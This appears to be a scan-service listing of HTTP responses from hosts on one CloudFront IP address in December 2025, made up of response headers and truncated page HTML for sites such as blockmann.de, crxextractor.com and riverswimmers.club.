window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-NGGSZTNBQD');
</script>
<!-- Bootstrap CSS -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- Bootstrap Icons -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.0/font/bootstrap-icons.css" rel="stylesheet">
<!-- Custom CSS -->
<link rel="stylesheet" href="assets/css/main.css">
</head>
<body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WP86JFDT"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<!-- Navigation -->
<nav class="navbar navbar-expand-lg navbar-dark fixed-top">
<div class="container">
<a class="navbar-brand" href="index.html">
<img src="assets/imgs/logos/logo.svg" alt="Plantryx" height="40">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav ms-auto">
<li class="nav-item">
<a class="nav-link active" href="index.html">Home</a>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Platform & Solutions
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="solutions/demand-planning.html">Demand Planning</a></li>
<li><a class="dropdown-item" href="solutions/supply-planning.html">Supply Planning</a></li>
<li><a class="dropdown-item" href="solutions/end-to-end-planning.html">End-to-End Planning</a></li>
<li><a class="dropdown-item" href="solutions/platform-capabilities.html">Platform Capabilities</a></li>
<li><a class="dropdown-item" href="solutions/integrations.html">Integrations</a></li>
</ul>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Who We Help
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="industries/mobility-auto.html">Mobility & Auto</a></li>
<li><a class="dropdown-item" href="industries/consumer-goods.html">Consumer Goods</a></li>
<li><a class="dropdown-item" href="industries/energy-commodities.html">Energy & Commodities</a></li>
<li><a class="dropdown-item" href="industries/high-tech.html">High Tech</a></li>
<li><a class="dropdown-item" href="industries/industrial-manufacturing.html">Industrial Manufacturing</a>
</li>
<li><a class="dropdown-item" href="industries/healthcare-life-sciences.html">Healthcare & Life
Open service 13.32.99.35:443 · kingwild.vip
2025-12-30 07:21
HTTP/1.1 403 Forbidden Server: CloudFront Date: Tue, 30 Dec 2025 07:21:30 GMT Content-Type: text/html Content-Length: 986 Connection: close X-Cache: Error from cloudfront Via: 1.1 68b2682a924ac399aa2724b5b439e75c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: p_3nn8_6V2NSyAjd5_AYjroMBTRQqWYoC77TjTb-SxOp1suAj3AWLg== Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>403 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> The Amazon CloudFront distribution is configured to block access from your country. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: p_3nn8_6V2NSyAjd5_AYjroMBTRQqWYoC77TjTb-SxOp1suAj3AWLg== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:443 · exchange-ui-master.rnd.exberry-rnd.io
2025-12-27 01:23
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1382
Connection: close
Last-Modified: Wed, 24 Dec 2025 16:53:30 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Sat, 27 Dec 2025 01:23:29 GMT
Cache-Control: max-age=0
ETag: "af45d1bd3fa2b39020b254401151f46e"
X-Cache: Hit from cloudfront
Via: 1.1 d262e104d5d9dd6a4a52f090bdf9395c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: JiHbo6mPe22PgYfJ8H1C960e-xt075buKrTfs4EijFnlnTEWp_jM1g==
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: frame-ancestors 'none'
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Vary: Origin
Page title: Exberry Master Exchange
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="description" content="Web application for traders" />
<meta name="title" content="Exberry Master Exchange" />
<title>Exberry Master Exchange</title>
<link rel="mask-icon" href="/static/favicon.png" color="#FFFFFF" />
<link rel="shortcut icon" id="favicon" href="/static/favicon.png" type="image/png" />
<link rel="apple-touch-icon" href="/static/apple-touch-icon.png" sizes="180x180" />
<link rel="alternate icon" href="/static/favicon.png" type="image/png" sizes="32x32" />
<link rel="manifest" href="/manifest.webmanifest">
<meta name="theme-color" content="#ffffff" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<!-- MUI font -->
<link
href="https://fonts.googleapis.com/css2?family=Noto%20Sans:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap"
rel="stylesheet"
/>
<!-- Default loaded css only spinner -->
<script type="module" crossorigin src="/assets/index-DzeHuMB_-1766595146095.js"></script>
<link rel="stylesheet" crossorigin href="/assets/index-NTh3zHMw-1766595146095.css">
<script id="vite-plugin-pwa:register-sw" src="/registerSW.js"></script></head>
<body>
<div id="root">
<div id="loading"></div>
</div>
</body>
</html>
Open service 13.32.99.35:80 · blockmann.de
2025-12-23 23:07
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Tue, 23 Dec 2025 23:07:28 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://blockmann.de/ X-Cache: Redirect from cloudfront Via: 1.1 39e6266db143f6443f194d8c60e22480.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: 2WQ3phggoIDOKqSZU12wL3B6-_Dvfn_gx6Rrk6ETg5rq9XQa0gRpkQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · blockmann.de
2025-12-23 23:07
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 84965
Connection: close
Date: Tue, 23 Dec 2025 23:07:30 GMT
Last-Modified: Mon, 22 Dec 2025 12:40:17 GMT
ETag: "48d52b86fed523f4572aff11ff17b0f4"
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 7251dede1ac94066b27bcd33919b30c6.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: mN6ekrc91qJmCDsfJzcJ4JGqn8X53zWZb_2HPw8tDd7J9wdw2_66Jg==
Page title: Wir machen Meta zu deinem Anfragekanal Nr. 1 | Blockmann
<!DOCTYPE html><!-- Last Published: Mon Dec 22 2025 12:38:56 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-page="692acc165bee8d5279ed4577" data-wf-site="692acc165bee8d5279ed458f" lang="de">
<head>
<meta charset="utf-8">
<title>Wir machen Meta zu deinem Anfragekanal Nr. 1 | Blockmann</title>
<link href="https://www.blockmann.de" rel="canonical">
<meta property="og:url" content="https://www.blockmann.de">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 und verschaffen dir 1a Kundenanfragen, indem wir die Meta‑Ads, Funnel & Kampagnen unserer Kunden übernehmen." name="description">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 | Blockmann" property="og:title">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 und verschaffen dir 1a Kundenanfragen, indem wir die Meta‑Ads, Funnel & Kampagnen unserer Kunden übernehmen." property="og:description">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 | Blockmann" property="twitter:title">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 und verschaffen dir 1a Kundenanfragen, indem wir die Meta‑Ads, Funnel & Kampagnen unserer Kunden übernehmen." property="twitter:description">
<meta property="og:type" content="website">
<meta content="summary_large_image" name="twitter:card">
<meta content="width=device-width, initial-scale=1" name="viewport">
<link href="css/normalize-0d336a97.css" rel="stylesheet" type="text/css">
<link href="css/webflow-b2dfaf5c.css" rel="stylesheet" type="text/css">
<link href="css/dev-blockmann-59a11b489cd45c6905b063aa7.webflow-6a95b8dd.css" rel="stylesheet" type="text/css">
<script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
<link href="images/favicon.png" rel="shortcut icon" type="image/x-icon">
<link href="images/webclip.png" rel="apple-touch-icon"><!-- Finsweet Cookie Consent -->
<script async="" fs-cc-mode="opt-in" fs-cc-endpoint="https://cookie-consent-dunkel-consulting.kontakt-231.workers.dev/">"use strict";(()=>{var Xe=Object.defineProperty;var Ze=(o,e,t)=>e in o?Xe(o,e,{enumerable:!0,configurable:!0,writable:!0,value:t}):o[e]=t;var u=(o,e,t)=>(Ze(o,typeof e!="symbol"?e+"":e,t),t);var N=(o,e="flex")=>new Promise(t=>{o.style.opacity="0",o.style.display=e,function n(){let r=parseFloat(o.style.opacity);if(r>=1){t();return}let s=r+.1;o.style.opacity=s.toString(),requestAnimationFrame(n)}()}),U=o=>new Promise(e=>{o.style.opacity="1",function t(){let r=parseFloat(o.style.opacity)-.1;o.style.opacity=r.toString(),r<=0?(o.style.display="none",e()):requestAnimationFrame(t)}()});var x=class{static activateAlerts(){this.alertsActivated=!0}static alert(e,t){if(this.alertsActivated&&window.alert(e),t==="error")throw new Error(e)}};u(x,"alertsActivated",!1);var w=(o,e)=>!!o&&e.includes(o);var A=(o,e)=>(Array.isArray(e)||(e=[e]),e.map(n=>o.dispatchEvent(new Event(n,{bubbles:!0}))).every(n=>n));function pe(o,e,t,n=!0){let r=t?[t]:[];if(!o)return r;let s=o.split(",").reduce((i,a)=>{let c=a.trim();return(!n||c)&&i.push(c),i},[]);if(e){let i=s.filter(a=>w(a,e));return i.length?i:r}return s}var ue=o=>Object.entries(o);var j=o=>Object.keys(o);var Q=o=>{let{overflow:e}=getComputedStyle(o);return e==="auto"||e==="scroll"};var Ae=o=>!!(o.offsetWidth||o.offsetHeight||o.getClientRects().length);var y=(o,e,t=document)=>{let n=t.querySelector(o);if(n instanceof e)return n};var me=o=>o.replace(/\/+$/,"");var X=(o,e=!0)=>(e!==o.checked&&(o.checked=e,A(o,["click","input","change"])),o.type==="checkbox"?o.checked:o.value);var ke=o=>new Promise(e=>setTimeout(e,o));var Z=class{constructor({element:e,duration:t}){u(this,"element");u(this,"active",!1);u(this,"running",!1);u(this,"runningPromise");u(this,"duration");u(this,"isActive",()=>this.active);u(this,"isRunning",()=>this.running);u(this,"untilFinished",()=>this.runningPromise);var n,r;this.element=typeof e=="string"?y(e,HTMLElement)||x.aler
Open service 13.32.99.35:443 · exchange-ui-master.rnd.exberry-rnd.io
2025-12-23 08:15
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1382
Connection: close
Last-Modified: Mon, 22 Dec 2025 12:32:54 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Tue, 23 Dec 2025 08:15:40 GMT
Cache-Control: max-age=0
ETag: "ab2a45ecac6d7d3f2ca80c3e4fcaab0d"
X-Cache: Hit from cloudfront
Via: 1.1 0a71d283a25c1e3f082b4dbc9d844dfe.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: sW3O41JQx0RWnyEknTc2C9RCe_TYo60GIztlueBiNf8Dqci0iWm0Qw==
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: frame-ancestors 'none'
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Vary: Origin
Page title: Exberry Master Exchange
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="description" content="Web application for traders" />
<meta name="title" content="Exberry Master Exchange" />
<title>Exberry Master Exchange</title>
<link rel="mask-icon" href="/static/favicon.png" color="#FFFFFF" />
<link rel="shortcut icon" id="favicon" href="/static/favicon.png" type="image/png" />
<link rel="apple-touch-icon" href="/static/apple-touch-icon.png" sizes="180x180" />
<link rel="alternate icon" href="/static/favicon.png" type="image/png" sizes="32x32" />
<link rel="manifest" href="/manifest.webmanifest">
<meta name="theme-color" content="#ffffff" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<!-- MUI font -->
<link
href="https://fonts.googleapis.com/css2?family=Noto%20Sans:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap"
rel="stylesheet"
/>
<!-- Default loaded css only spinner -->
<script type="module" crossorigin src="/assets/index-UlJHoZtL-1766406709753.js"></script>
<link rel="stylesheet" crossorigin href="/assets/index-NTh3zHMw-1766406709753.css">
<script id="vite-plugin-pwa:register-sw" src="/registerSW.js"></script></head>
<body>
<div id="root">
<div id="loading"></div>
</div>
</body>
</html>
Open service 13.32.99.35:443 · crxextractor.com
2025-12-23 07:30
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 12924
Connection: close
Last-Modified: Mon, 04 Dec 2023 21:45:52 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Tue, 23 Dec 2025 07:30:45 GMT
ETag: "79adf69782c1a8cac16fa085fbb938c4"
X-Cache: Hit from cloudfront
Via: 1.1 7251dede1ac94066b27bcd33919b30c6.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: estZRxVTIfGO6o19uhDNFXa30Ui0DoO24dmxfFHuwtkUEzG459PN9Q==
Age: 2772
Page title: Get .CRX Chrome Extension file, it's source code and download .CRX to your computer.
<!DOCTYPE html><html lang="en"><head><script>!function(e,t,a,n,r){e[n]=e[n]||[],e[n].push({"gtm.start":(new Date).getTime(),event:"gtm.js"});var g=t.getElementsByTagName(a)[0],m=t.createElement(a),s="dataLayer"!=n?"&l="+n:"";m.async=!0,m.src="https://www.googletagmanager.com/gtm.js?id="+r+s,g.parentNode.insertBefore(m,g)}(window,document,"script","dataLayer","GTM-FVTW7P4")</script><title>Get .CRX Chrome Extension file, it's source code and download .CRX to your computer.</title><meta name="keywords" content="crx, chrome, extension, get, extract, download, source, code" /><meta name="description" content="Get Chrome Extension as .crx file and extract it's source code in one click, right in your browser." /><meta charset="utf-8" /><meta name="viewport" content="width=device-width" /><meta name="author" content="Vladimir Ignatev" /><link rel="icon" type="image/png" href="images/favicon.png" /><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><body><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-FVTW7P4" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><div class="breakthrough center nomargin"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9423687387443767" data-ad-slot="2749869570" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle=window.adsbygoogle||[]).push({})</script></div><div class="tool-wrapper"><div class="logo"><img src="images/logo.png" height="50" alt="crx extractor logo"></div><div class="welcome"><div class="row"><div class="twelve columns"><div class="container"><div class="twelve columns"><div class="header-wrapper"><h1>Get .crx Chrome Extension file and extract source code in one click</h1></div><div class="cta-wrapper"><button class="button-primary cta-button" id="cta-letsstart" tabindex="1">Let's start</button></div></div></div></div><div class="twelve columns adsense-top-side hide-small"><div class="adsense-wrapper hide-small" style="margin-top:-17rem"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9423687387443767" data-ad-slot="2749869570" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle=window.adsbygoogle||[]).push({})</script></div></div></div></div><div class="tool container" style="display:none"><div class="row"><div class="five columns"><h3 class="center">Get source code</h3><div id="drop-zone"><div class="thanks" style="display:none"><p>You're awesome! Thank you! ❤</p></div><div class="ui-wrapper"><p>Drop .crx file here or click <br>the button to choose the file</p><input type="file" name="file" id="file" tabindex="5"></div><div class="download-btn-wrapper"><a href="#" style="display:none" tabindex="6" class="download button button-primary">Download source</a></div></div><div class="download-source-err" style="display:none"><p></p></div></div><div class="seven columns"><div class="container"><div class="row"><div class="twelve columns"><h3 class="center">Download .CRX file from the <a href="https://chromewebstore.google.com/" target="_blank" rel="nofollow">Chrome WebStore</a></h3></div></div><div class="row"><div class="twelve columns"><input tabindex="2" id="crx-download-input" class="u-full-width" placeholder="Paste the URL of Chrome Extension here"><button class="download-crx-ok button-primary" tabindex="3">OK</button><a href="#" style="display:none" class="download-crx button button-primary" tabindex="4">Get .CRX</a><p id="crx-suggestion"><i class="typcn typcn-arrow-sync"></i><span class="name">extension</span><span class="link">link</span></p></div></div><div class="row"><div class="twelve columns"><div class
Open service 13.32.99.35:443 · www.legalaidconnections.org
2025-12-23 06:13
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 829
Connection: close
Date: Tue, 23 Dec 2025 06:13:34 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: x-wtc-header,Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 8b889e35789d2b97f2ba8771acc9a008.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: 5l4sbV9-mcgOwY6slt_H-VwW6L_MreV6ab0KI8YAgWPkr0zdTOMXDQ==
Page title: Atlanta Legal Aid Society, Inc.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<html>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-82274979-1', 'auto');
ga('send', 'pageview');
</script>
<head>
<title>Atlanta Legal Aid Society, Inc. </title>
</head>
<frameset rows="100%,*" border="0">
<frame src="https://events.atlantalegalaid.org/index.php/cocktails-connections-working-draft/" frameborder="0" />
<frame frameborder="0" noresize />
</frameset>
<!-- pageok -->
<!-- 05 -->
<!-- -->
</html>
Open service 13.32.99.35:443 · sf.richter-rw.de
2025-12-23 04:31
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Tue, 23 Dec 2025 04:31:17 GMT Server: Apache Link: <https://www.richter-rw.de/wp-json/>; rel="https://api.w.org/", <https://www.richter-rw.de/wp-json/wp/v2/pages/930>; rel="alternate"; title="JSON"; type="application/json", <https://www.richter-rw.de/>; rel=shortlink, <https://sf.richter-rw.de/wp-content/cache/minify/818c0.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/85615.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/3ceb8.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/1f540.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/c0b5c.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/49194.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/e6deb.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/18003.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/6178e.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/078d1.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/a8453.css>; rel=preload; as=style, <https://sf.richter-rw.de/wp-content/cache/minify/d8d42.css>; rel=preload; as=style, <https://sf.richter-rw.de/wp-content/cache/minify/59cac.css>; rel=preload; as=style Expires: Tue, 23 Dec 2025 04:41:23 GMT Pragma: public Cache-Control: max-age=606, public Cache-Control: max-age=0, no-cache, s-maxage=10 X-Powered-By: W3 Total Cache/2.8.14 Referrer-Policy: X-Mod-Pagespeed: 1.14.36.1-0 Access-Control-Allow-Origin: * Vary: Accept-Encoding X-Cache: Miss from cloudfront Via: 1.1 4612dc3b414cf2057f542e94733d59bc.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: QAG1Xj3qpg_inKcgt2LdAz7nSBsPp1sSCOZtg8ZoNvxINswOW3ES5g==
Open service 13.32.99.35:443 · www.smmallsonline.com
2025-12-23 04:16
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Tue, 23 Dec 2025 04:16:27 GMT X-Powered-By: CloudFront Link: <https://www.smmallsonline.com/wp-json/>; rel="https://api.w.org/", <https://www.smmallsonline.com/wp-json/wp/v2/pages/1190>; rel="alternate"; title="JSON"; type="application/json", <https://www.smmallsonline.com/>; rel=shortlink Server: CloudFront X-Cache: Miss from cloudfront Via: 1.1 a54cda8ccda3480314f451558e4dd062.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: zNjGuBr8cOaGPPrKsROopBaw5DrFPZvUyHvyuNR8Kwkbze6e0e1AeQ== X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: object-src 'none'; frame-ancestors 'self' https://play.smmetaverse.world X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Cache-Control: no-cache, no-store Expires: -1 Pragma: no-cache
Open service 13.32.99.35:80 · 0xd5.io
2025-12-23 02:12
HTTP/1.1 403 Forbidden Server: CloudFront Date: Tue, 23 Dec 2025 02:12:24 GMT Content-Type: text/html Content-Length: 915 Connection: close X-Cache: Error from cloudfront Via: 1.1 5492e1c9a06f2320204e7fcc383cff5c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: DFT4JcbWnH1KCBXzrhgu9Mt8zcga94w6bAgx0xQkrrVREycMHaSFSQ== Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>403 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> Bad request. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: DFT4JcbWnH1KCBXzrhgu9Mt8zcga94w6bAgx0xQkrrVREycMHaSFSQ== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:443 · 0xd5.io
2025-12-23 02:12
HTTP/1.1 400 Bad Request Server: CloudFront Date: Tue, 23 Dec 2025 02:12:24 GMT Content-Type: text/html Content-Length: 915 Connection: close X-Cache: Error from cloudfront Via: 1.1 a54cda8ccda3480314f451558e4dd062.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: AuBIHStQx-C8jFXvQipun1-ah_I8nX_e1_Gtu68YajoPUfY0mJGtAg== Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>400 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> Bad request. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: AuBIHStQx-C8jFXvQipun1-ah_I8nX_e1_Gtu68YajoPUfY0mJGtAg== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:443 · riverswimmers.club
2025-12-23 00:36
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 15069
Connection: close
Date: Mon, 22 Dec 2025 23:47:22 GMT
Last-Modified: Sun, 04 Feb 2018 02:39:05 GMT
ETag: "ce4f599ce4e1bbe8977e7e17965f7c9a"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 4612dc3b414cf2057f542e94733d59bc.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: affbKvaMR8lvb6GW3UpKcytAuxL13Z62wjnegu6lgIa61rxTRkKlmQ==
Age: 2948
Page title: River Swimmers Club
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>River Swimmers Club</title>
<meta property="og:title" content="River Swimmers Club" />
<meta property="og:type" content="website" />
<meta property="og:url" content="http://riverswimmers.club/" />
<meta property="og:image" content="http://riverswimmers.club/_img/rsc.jpg" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M"
crossorigin="anonymous">
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4"
crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js" integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1"
crossorigin="anonymous"></script>
<link href="https://vjs.zencdn.net/6.2.7/video-js.css" rel="stylesheet">
<!-- If you'd like to support IE8 -->
<script src="https://vjs.zencdn.net/ie8/1.1.2/videojs-ie8.min.js"></script>
<link rel="stylesheet" href="/_css/styles.css">
<script src="plyr/plyr.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="plyr/plyr.css">
<script>
(function (i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r;
i[r] = i[r] || function () {
(i[r].q = i[r].q || []).push(arguments)
}, i[r].l = 1 * new Date();
a = s.createElement(o),
m = s.getElementsByTagName(o)[0];
a.async = 1;
a.src = g;
m.parentNode.insertBefore(a, m)
})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-44024954-4', 'auto');
ga('send', 'pageview');
</script>
<script src="https://www.gstatic.com/firebasejs/4.4.0/firebase.js"></script>
<script>
// Initialize Firebase
var config = {
apiKey: "AIzaSyCYxdDdn-0DkSLV4fgeds1ELzznRFyDHfI",
authDomain: "riverswimmers-club.firebaseapp.com",
databaseURL: "https://riverswimmers-club.firebaseio.com",
projectId: "riverswimmers-club",
storageBucket: "riverswimmers-club.appspot.com",
messagingSenderId: "55477810250"
};
firebase.initializeApp(config);
</script>
<script type="text/javascript">
/**
* Handles the sign in button press.
*/
function toggleSignIn() {
if (firebase.auth().currentUser) {
// [START signout]
firebase.auth().signOut();
// [END signout]
} else {
var email = document.getElementById('email').value;
var password = document.getElementById('password').value;
if (email.length < 4) {
alert('Please enter an email address.');
return;
}
if (password.length < 4) {
alert('Please enter a password.');
return;
}
// Sign in with email and pass.
// [START authwithemail]
firebase.auth().signInWithEmailAndPassword(email, password).catch(function (error) {
// Handle Errors here.
var errorCode = error.code;
var errorMessage = error.message;
// [START_EXCLUDE]
if (errorCode === 'auth/wrong-password') {
alert('Wrong
Open service 13.32.99.35:443 · triathlon-lumina.com
2025-12-22 19:46
